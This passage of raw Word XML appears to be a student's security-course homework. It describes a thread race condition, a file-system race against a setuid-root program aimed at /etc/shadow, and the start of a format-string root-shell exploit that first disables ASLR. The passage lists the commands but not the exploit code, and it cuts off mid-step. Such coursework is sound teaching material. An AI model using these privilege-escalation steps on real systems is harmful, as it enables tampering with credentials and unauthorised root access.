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70D" w:rsidRDefault="00202636" w:rsidP="007139D1">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Write a program with a race condition, </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>either in</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> threads, processes or signals. (The flaw need not be exploitable) Explain </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>the software defect, and why it forms a race condition</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidR="002C670D">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0078690E" w:rsidRPr="000A24F9" w:rsidRDefault="0078690E" w:rsidP="0078690E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="360"/>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000A24F9">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">The code will create </w:t>
      </w:r>
      <w:r w:rsidR="000A24F9">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>four (</w:t>
      </w:r>
      <w:r w:rsidRPr="000A24F9">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>4</w:t>
      </w:r>
      <w:r w:rsidR="000A24F9">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
      <w:r w:rsidRPr="000A24F9">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve"> threads an in each thread increment a counter. The majority of the time the code will create a thread and increase the counter before the main function creates another thread; however, there is a possibility that a later thread can read the counter before an earlier thread has time to finish assigning the incremented value. In this case, the final printed value will not be the total number of threads (4), but a lower number.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="007139D1" w:rsidRPr="0078690E" w:rsidRDefault="00A97730" w:rsidP="002C670D">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="360"/>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0078690E">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">File name: </w:t>
      </w:r>
      <w:r w:rsidR="003E70DD" w:rsidRPr="0078690E">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Snyder_HW_0</w:t>
      </w:r>
      <w:r w:rsidR="0078690E" w:rsidRPr="0078690E">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>3</w:t>
      </w:r>
      <w:r w:rsidR="003E70DD" w:rsidRPr="0078690E">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>_01</w:t>
      </w:r>
      <w:r w:rsidR="003A7A3E" w:rsidRPr="0078690E">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidR="0078690E" w:rsidRPr="0078690E">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>c</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0065271E" w:rsidRDefault="0065271E" w:rsidP="0065271E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="360"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="004304C0" w:rsidRDefault="004304C0" w:rsidP="002C670D">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="002C670D">
        <w:t>Write a</w:t>
      </w:r>
      <w:r w:rsidR="0065271E">
        <w:t xml:space="preserve"> program </w:t>
      </w:r>
      <w:r w:rsidR="00202636">
        <w:t xml:space="preserve">with a race </w:t>
      </w:r>
      <w:r w:rsidR="0041322C">
        <w:t>condition</w:t>
      </w:r>
      <w:r w:rsidR="00202636">
        <w:t xml:space="preserve"> in the file system. Demonstrate how to exploit the flaw. You may modify the code somewhat to allow for control of the program’s timing.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0051628A" w:rsidRPr="0051628A" w:rsidRDefault="0051628A" w:rsidP="00AB7FC6">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="360"/>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0051628A">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">In the Snyder_HW_03_02_vulp.c </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="0051628A">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>file</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="0051628A">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve"> the DELAY can be updated increase/decrease the delay and control the program’s timing.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009C0A08" w:rsidRPr="0051628A" w:rsidRDefault="009C0A08" w:rsidP="00AB7FC6">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="360"/>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0051628A">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Steps:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0051628A" w:rsidRPr="0051628A" w:rsidRDefault="0051628A" w:rsidP="009C0A08">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="11"/>
        </w:numPr>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0051628A">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>As root, backup the shadow file</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0051628A" w:rsidRPr="0051628A" w:rsidRDefault="0051628A" w:rsidP="0051628A">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="11"/>
        </w:numPr>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0051628A">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>cd /</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0051628A">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>etc</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w:rsidR="0051628A" w:rsidRPr="0051628A" w:rsidRDefault="0051628A" w:rsidP="0051628A">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="11"/>
        </w:numPr>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0051628A">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>cp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0051628A">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve"> shadow </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0051628A">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>shadow_bak</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w:rsidR="0051628A" w:rsidRPr="0051628A" w:rsidRDefault="0051628A" w:rsidP="0051628A">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="11"/>
        </w:numPr>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0051628A">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>As root, change the permissions of the scripts</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0051628A" w:rsidRPr="0051628A" w:rsidRDefault="0051628A" w:rsidP="0051628A">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="11"/>
        </w:numPr>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0051628A">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>chmod</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0051628A">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve"> 774 Snyder_HW_03_02_check_shadow.sh</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0051628A" w:rsidRPr="0051628A" w:rsidRDefault="0051628A" w:rsidP="0051628A">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="11"/>
        </w:numPr>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0051628A">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>chmod</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0051628A">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve"> 774 Snyder_HW_03_02_attack_loop.sh</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0051628A" w:rsidRPr="0051628A" w:rsidRDefault="0051628A" w:rsidP="0051628A">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="11"/>
        </w:numPr>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0051628A">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>chmod</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0051628A">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve"> 774 Snyder_HW_03_02_vulp_loop.sh</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009C0A08" w:rsidRPr="0051628A" w:rsidRDefault="009C0A08" w:rsidP="009C0A08">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="11"/>
        </w:numPr>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0051628A">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>As root, compile the Snyder_HW_03_02_vulp program:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009C0A08" w:rsidRPr="0051628A" w:rsidRDefault="009C0A08" w:rsidP="009C0A08">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="11"/>
        </w:numPr>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0051628A">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>gcc</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0051628A">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve"> –o Snyder_HW_03_02_vulp Snyder_HW_03_02_vulp.c</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009C0A08" w:rsidRPr="0051628A" w:rsidRDefault="009C0A08" w:rsidP="009C0A08">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="11"/>
        </w:numPr>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0051628A">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>As root, change the ownership and permissions of the program</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009C0A08" w:rsidRPr="0051628A" w:rsidRDefault="009C0A08" w:rsidP="009C0A08">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="11"/>
        </w:numPr>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0051628A">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>chown</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0051628A">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0051628A">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>root:root</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0051628A">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve"> Snyder_HW_03_02_vulp</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009C0A08" w:rsidRPr="0051628A" w:rsidRDefault="009C0A08" w:rsidP="009C0A08">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="11"/>
        </w:numPr>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0051628A">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>chmod</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0051628A">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve"> 4755 Snyder_HW_03_02_vulp</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009C0A08" w:rsidRPr="0051628A" w:rsidRDefault="009C0A08" w:rsidP="009C0A08">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="11"/>
        </w:numPr>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0051628A">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>As a regular user, create a blank file name in /</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0051628A">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>tmp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0051628A">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve"> called </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0051628A">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>UserOwnerFile</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w:rsidR="009C0A08" w:rsidRPr="0051628A" w:rsidRDefault="009C0A08" w:rsidP="009C0A08">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="11"/>
        </w:numPr>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0051628A">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>In separate windows do the following:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009C0A08" w:rsidRPr="0051628A" w:rsidRDefault="009C0A08" w:rsidP="009C0A08">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="11"/>
        </w:numPr>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0051628A">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Run the password loop:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009C0A08" w:rsidRPr="0051628A" w:rsidRDefault="009C0A08" w:rsidP="009C0A08">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="11"/>
        </w:numPr>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0051628A">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>./Snyder_HW_03_02_</w:t>
      </w:r>
      <w:r w:rsidR="005815F3" w:rsidRPr="0051628A">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>check_shadow</w:t>
      </w:r>
      <w:r w:rsidRPr="0051628A">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>.sh</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009C0A08" w:rsidRPr="0051628A" w:rsidRDefault="009C0A08" w:rsidP="009C0A08">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="11"/>
        </w:numPr>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0051628A">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Run the attack loop:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009C0A08" w:rsidRPr="0051628A" w:rsidRDefault="009C0A08" w:rsidP="009C0A08">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="11"/>
        </w:numPr>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0051628A">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>sudo</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0051628A">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve"> ./Snyder_HW_03_02_attack_loop.sh</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009C0A08" w:rsidRPr="0051628A" w:rsidRDefault="009C0A08" w:rsidP="009C0A08">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="11"/>
        </w:numPr>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0051628A">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Run the </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0051628A">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>vulp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0051628A">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve"> loop:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009C0A08" w:rsidRPr="0051628A" w:rsidRDefault="009C0A08" w:rsidP="009C0A08">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="11"/>
        </w:numPr>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0051628A">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>./Snyder_HW_03_02_vulp_loop.sh</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008B5CF4" w:rsidRPr="0051628A" w:rsidRDefault="008B5CF4" w:rsidP="009C0A08">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="11"/>
        </w:numPr>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0051628A">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Asdf</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w:rsidR="00AB7FC6" w:rsidRPr="0051628A" w:rsidRDefault="00AB7FC6" w:rsidP="008B5CF4">
      <w:pPr>
        <w:ind w:left="360"/>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0051628A">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>File name</w:t>
      </w:r>
      <w:r w:rsidR="00BA6E9D" w:rsidRPr="0051628A">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>s</w:t>
      </w:r>
      <w:r w:rsidRPr="0051628A">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">: </w:t>
      </w:r>
      <w:r w:rsidR="008B5CF4" w:rsidRPr="0051628A">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Snyder_HW_03</w:t>
      </w:r>
      <w:r w:rsidR="00A25106" w:rsidRPr="0051628A">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>_02_</w:t>
      </w:r>
      <w:r w:rsidR="008B5CF4" w:rsidRPr="0051628A">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>check_</w:t>
      </w:r>
      <w:r w:rsidR="005815F3" w:rsidRPr="0051628A">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>shadow.</w:t>
      </w:r>
      <w:r w:rsidR="008B5CF4" w:rsidRPr="0051628A">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>sh</w:t>
      </w:r>
      <w:r w:rsidR="00A97730" w:rsidRPr="0051628A">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>;</w:t>
      </w:r>
      <w:r w:rsidR="0051628A" w:rsidRPr="0051628A">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve"> Snyder_HW_03</w:t>
      </w:r>
      <w:r w:rsidR="00932C98" w:rsidRPr="0051628A">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>_02</w:t>
      </w:r>
      <w:r w:rsidR="0051628A" w:rsidRPr="0051628A">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>_attack_loop.sh</w:t>
      </w:r>
      <w:r w:rsidR="00932C98" w:rsidRPr="0051628A">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>; Snyder_HW_0</w:t>
      </w:r>
      <w:r w:rsidR="0051628A" w:rsidRPr="0051628A">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>3</w:t>
      </w:r>
      <w:r w:rsidR="00932C98" w:rsidRPr="0051628A">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>_02_</w:t>
      </w:r>
      <w:r w:rsidR="0051628A" w:rsidRPr="0051628A">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>vulp_loop.sh; Snyder_HW_03_02_vulp.c</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidR="0051628A" w:rsidRPr="0051628A">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>;</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidR="0051628A" w:rsidRPr="0051628A">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve"> Snyder_HW_03_02_input</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0065271E" w:rsidRDefault="0065271E" w:rsidP="0065271E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="360"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00680EA1" w:rsidRDefault="00202636" w:rsidP="00680EA1">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:t>Write a program that has a format string flaw. Make the program SUID root, and exploit it to obtain a root shell. Overwrite the .</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>dtors</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> section to start the execution of the shellcode.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00081D7A" w:rsidRPr="00E5743C" w:rsidRDefault="00081D7A" w:rsidP="00081D7A">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="360"/>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E5743C">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Steps:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E5743C" w:rsidRPr="00E5743C" w:rsidRDefault="00E5743C" w:rsidP="00081D7A">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="14"/>
        </w:numPr>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E5743C">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Disable ASLR:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E5743C" w:rsidRPr="00E5743C" w:rsidRDefault="00E5743C" w:rsidP="00E5743C">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="14"/>
        </w:numPr>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00E5743C">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>sudo</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00E5743C">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve"> –</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00E5743C">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>i</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w:rsidR="00E5743C" w:rsidRPr="00E5743C" w:rsidRDefault="00E5743C" w:rsidP="00E5743C">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="14"/>
        </w:numPr>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00E5743C">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>sysctl</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00E5743C">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve"> –w </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00E5743C">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>kernel.randomize_va_space</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00E5743C">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>=0</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00081D7A" w:rsidRPr="00E5743C" w:rsidRDefault="00081D7A" w:rsidP="00081D7A">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="14"/>
        </w:numPr>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E5743C">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Compile the Snyder_HW_03_03 program</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00081D7A" w:rsidRPr="00E5743C" w:rsidRDefault="00081D7A" w:rsidP="00081D7A">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="14"/>
        </w:numPr>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00E5743C">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>gcc</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="0002761A" w:rsidRPr="00E5743C">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve"> -g</w:t>
      </w:r>
      <w:r w:rsidRPr="00E5743C">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve"> Snyder_HW_03_03.c –o Snyder_HW_03_03</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00081D7A" w:rsidRPr="00E5743C" w:rsidRDefault="00081D7A" w:rsidP="00081D7A">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
